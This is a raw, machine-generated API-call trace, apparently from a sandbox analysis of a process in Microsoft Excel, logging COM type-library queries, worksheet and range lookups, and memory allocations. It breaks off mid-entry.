[0157.756] IUnknown:Release (This=0xa02b318) returned 0x3 [0157.756] IUnknown:QueryInterface (in: This=0xa02b318, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd938 | out: ppvObject=0x1dd938*=0x0) returned 0x80004002 [0157.756] IUnknown:AddRef (This=0xa02b210) returned 0x3 [0157.756] IUnknown:Release (This=0xa02b210) returned 0x2 [0157.756] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd938 | out: ppvObject=0x1dd938*=0x0) returned 0x80004002 [0157.757] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93f60 [0157.757] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac66d0 [0157.757] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac6610 [0157.757] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c56850 [0157.757] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x95e3920 [0157.757] IUnknown:QueryInterface (in: This=0xa02b2c0, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd938 | out: ppvObject=0x1dd938*=0x0) returned 0x80004002 [0157.757] IUnknown:QueryInterface (in: This=0xa02b318, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd938 | out: ppvObject=0x1dd938*=0x0) returned 0x80004002 [0157.757] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd938 | out: ppvObject=0x1dd938*=0x0) returned 0x80004002 [0157.757] IUnknown:AddRef (This=0xa02b2c0) returned 0x3 [0157.757] IUnknown:QueryInterface (in: This=0xa02b2c0, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dcab0 | out: ppvObject=0x1dcab0*=0x0) returned 0x80004002 [0157.757] IUnknown:AddRef (This=0xa02b2c0) returned 0x4 [0157.757] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b2c0, ppTypeAttr=0x1dcac8, pDummy=0x10 | out: ppTypeAttr=0x1dcac8, pDummy=0x10) returned 0x0 [0157.757] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b2c0) returned 0x0 [0157.757] IUnknown:Release (This=0xa02b2c0) returned 0x3 [0157.757] IUnknown:Release (This=0xa02b2c0) returned 0x2 [0157.757] IMalloc:Alloc (This=0x7fefecb5380, cb=0x118) returned 0x9c32110 [0157.757] IMalloc:Alloc (This=0x7fefecb5380, cb=0x4f8) returned 0x9a77bb0 [0157.757] IUnknown:AddRef (This=0xa02b318) returned 0x4 [0157.757] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b318, ppTypeAttr=0x1dcaa8, pDummy=0x1dcae4 | out: ppTypeAttr=0x1dcaa8, pDummy=0x1dcae4*=0xffffffff) returned 0x0 [0157.757] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x0, ppFuncDesc=0x1dcaa0, pDummy=0x1dcae8 | out: ppFuncDesc=0x1dcaa0, pDummy=0x1dcae8*=0xa02b318) returned 0x0 [0157.757] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.757] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x1, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.757] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.758] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x2, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.758] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.758] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x3, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.758] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.758] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x4, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.758] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.758] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x5, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.758] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.758] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x6, ppFuncDesc=0x1dcaa0, pDummy=0x1a0 | out: ppFuncDesc=0x1dcaa0, pDummy=0x1a0) returned 0x0 [0157.758] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.758] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x7, ppFuncDesc=0x1dcaa0, pDummy=0x160 | out: ppFuncDesc=0x1dcaa0, pDummy=0x160) returned 0x0 [0157.758] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.758] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x8, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.758] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.758] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x9, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.758] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.759] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xa, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.759] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.759] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xb, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.759] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.759] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xc, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.759] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.759] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xd, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.759] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.759] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xe, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.759] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.759] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xf, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.759] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.759] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x10, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.759] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.759] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x11, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x12, ppFuncDesc=0x1dcaa0, pDummy=0x1a0 | out: ppFuncDesc=0x1dcaa0, pDummy=0x1a0) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x13, ppFuncDesc=0x1dcaa0, pDummy=0x1a0 | out: ppFuncDesc=0x1dcaa0, pDummy=0x1a0) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x14, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x15, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x16, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x17, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x18, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x19, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x1a, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x1b, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b318, ppTypeAttr=0x1dcaa8, pDummy=0x1dcae4 | out: ppTypeAttr=0x1dcaa8, pDummy=0x1dcae4*=0xffffffff) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x0, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x1, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x2, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.760] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.760] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x3, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x4, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x5, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x6, ppFuncDesc=0x1dcaa0, pDummy=0x1a0 | out: ppFuncDesc=0x1dcaa0, pDummy=0x1a0) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x7, ppFuncDesc=0x1dcaa0, pDummy=0x160 | out: ppFuncDesc=0x1dcaa0, pDummy=0x160) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x8, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x9, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xa, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xb, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xc, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xd, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xe, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0xf, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x10, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x11, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.761] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x12, ppFuncDesc=0x1dcaa0, pDummy=0x1a0 | out: ppFuncDesc=0x1dcaa0, pDummy=0x1a0) returned 0x0 [0157.761] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x13, ppFuncDesc=0x1dcaa0, pDummy=0x1a0 | out: ppFuncDesc=0x1dcaa0, pDummy=0x1a0) returned 0x0 [0157.762] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x14, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.762] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x15, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.762] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x16, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.762] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x17, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.762] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x18, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.762] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x19, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.762] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x1a, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.762] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b318, index=0x1b, ppFuncDesc=0x1dcaa0, pDummy=0x50 | out: ppFuncDesc=0x1dcaa0, pDummy=0x50) returned 0x0 [0157.762] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b318) returned 0x0 [0157.762] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b318) returned 0x0 [0157.762] IUnknown:Release (This=0xa02b318) returned 0x3 [0157.762] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x7f04920 [0157.762] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x7f096a0 [0157.762] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x7f099c0 [0157.763] IUnknown:QueryInterface (in: This=0xa02b318, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc3a8 | out: ppvObject=0x1dc3a8*=0x0) returned 0x80004002 [0157.763] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b318, ppTypeAttr=0x1dc3a0, pDummy=0x10 | out: ppTypeAttr=0x1dc3a0, pDummy=0x10) returned 0x0 [0157.763] IUnknown:QueryInterface (in: This=0xa02b318, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc328 | out: ppvObject=0x1dc328*=0x0) returned 0x80004002 [0157.763] IUnknown:AddRef (This=0xa02b318) returned 0x4 [0157.763] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b318, ppTypeAttr=0x1dc320, pDummy=0x10 | out: ppTypeAttr=0x1dc320, pDummy=0x10) returned 0x0 [0157.763] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b318) returned 0x0 [0157.763] IUnknown:Release (This=0xa02b318) returned 0x3 [0157.763] strcpy_s (in: _Dst=0x9c55eb8, _DstSize=0xa, _Src="Worksheet" | out: _Dst="Worksheet") returned 0x0 [0157.763] IMalloc:Alloc (This=0x7fefecb5380, cb=0x140) returned 0xa262d00 [0157.763] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b318, ppTypeAttr=0x1dc2e0, pDummy=0xa02b318 | out: ppTypeAttr=0x1dc2e0, pDummy=0xa02b318*=0xfdf407b0) returned 0x0 [0157.763] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa02b318, ppTLib=0x1dc2e8, pIndex=0x1dc328 | out: ppTLib=0x1dc2e8*=0x9ab4b50, pIndex=0x1dc328*=0x2a0) returned 0x0 [0157.763] ITypeLib:RemoteGetLibAttr (in: This=0x9ab4b50, ppTLibAttr=0x1dbfd8, pDummy=0x0 | out: ppTLibAttr=0x1dbfd8, pDummy=0x0) returned 0x0 [0157.763] ITypeLib:RemoteGetDocumentation (in: This=0x9ab4b50, index=-1, refPtrFlags=0x1dbff0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x30000 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x30000) returned 0x0 [0157.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library", cchWideChar=57, lpMultiByteStr=0x1dc060, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXEÀ\x1d", lpUsedDefaultChar=0x0) returned 57 [0157.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Excel", cchWideChar=6, lpMultiByteStr=0x1dc170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Excel", lpUsedDefaultChar=0x0) returned 6 [0157.764] ITypeLib:LocalReleaseTLibAttr (This=0x9ab4b50) returned 0x0 [0157.764] IUnknown:AddRef (This=0xa02b318) returned 0x4 [0157.764] IUnknown:Release (This=0x9ab4b50) returned 0x1f [0157.764] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b318) returned 0x0 [0157.764] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b318) returned 0x0 [0157.764] IUnknown:AddRef (This=0xa02b210) returned 0x3 [0157.764] IUnknown:Release (This=0xa02b210) returned 0x2 [0157.764] IMalloc:Alloc (This=0x7fefecb5380, cb=0x14) returned 0x7f08de0 [0157.764] IUnknown:AddRef (This=0xa02b210) returned 0x3 [0157.764] IUnknown:Release (This=0xa02b210) returned 0x2 [0157.764] IMalloc:Free (This=0x7fefecb5380, pv=0x7f08de0) [0157.764] free (_Block=0x0) [0157.764] free (_Block=0x0) [0157.764] free (_Block=0x0) [0157.764] IUnknown:AddRef (This=0xa02b210) returned 0x3 [0157.764] IUnknown:Release (This=0xa02b210) returned 0x2 [0157.764] free (_Block=0x0) [0157.764] free (_Block=0x0) [0157.764] free (_Block=0x0) [0157.764] IUnknown:AddRef (This=0xa02b2c0) returned 0x3 [0157.764] IUnknown:QueryInterface (in: This=0xa02b2c0, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddc28 | out: ppvObject=0x1ddc28*=0x0) returned 0x80004002 [0157.765] IUnknown:QueryInterface (in: This=0xa02b2c0, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddc20 | out: ppvObject=0x1ddc20*=0x0) returned 0x80004002 [0157.765] IUnknown:Release (This=0xa02b2c0) returned 0x2 [0157.765] IUnknown:AddRef (This=0xa02b318) returned 0x5 [0157.765] IUnknown:QueryInterface (in: This=0xa02b318, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddc28 | out: ppvObject=0x1ddc28*=0x0) returned 0x80004002 [0157.765] IUnknown:QueryInterface (in: This=0xa02b318, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddc20 | out: ppvObject=0x1ddc20*=0x0) returned 0x80004002 [0157.765] IUnknown:Release (This=0xa02b318) returned 0x4 [0157.765] IUnknown:AddRef (This=0xa02b210) returned 0x3 [0157.765] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddc28 | out: ppvObject=0x1ddc28*=0x0) returned 0x80004002 [0157.765] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddc20 | out: ppvObject=0x1ddc20*=0x0) returned 0x80004002 [0157.765] IUnknown:Release (This=0xa02b210) returned 0x2 [0157.765] IMalloc:Alloc (This=0x7fefecb5380, cb=0x8) returned 0xa267610 [0157.765] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa267610) returned 0x8 [0157.765] IMalloc:Alloc (This=0x7fefecb5380, cb=0x78) returned 0xa212580 [0157.765] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa212580) returned 0x78 [0157.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.777] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 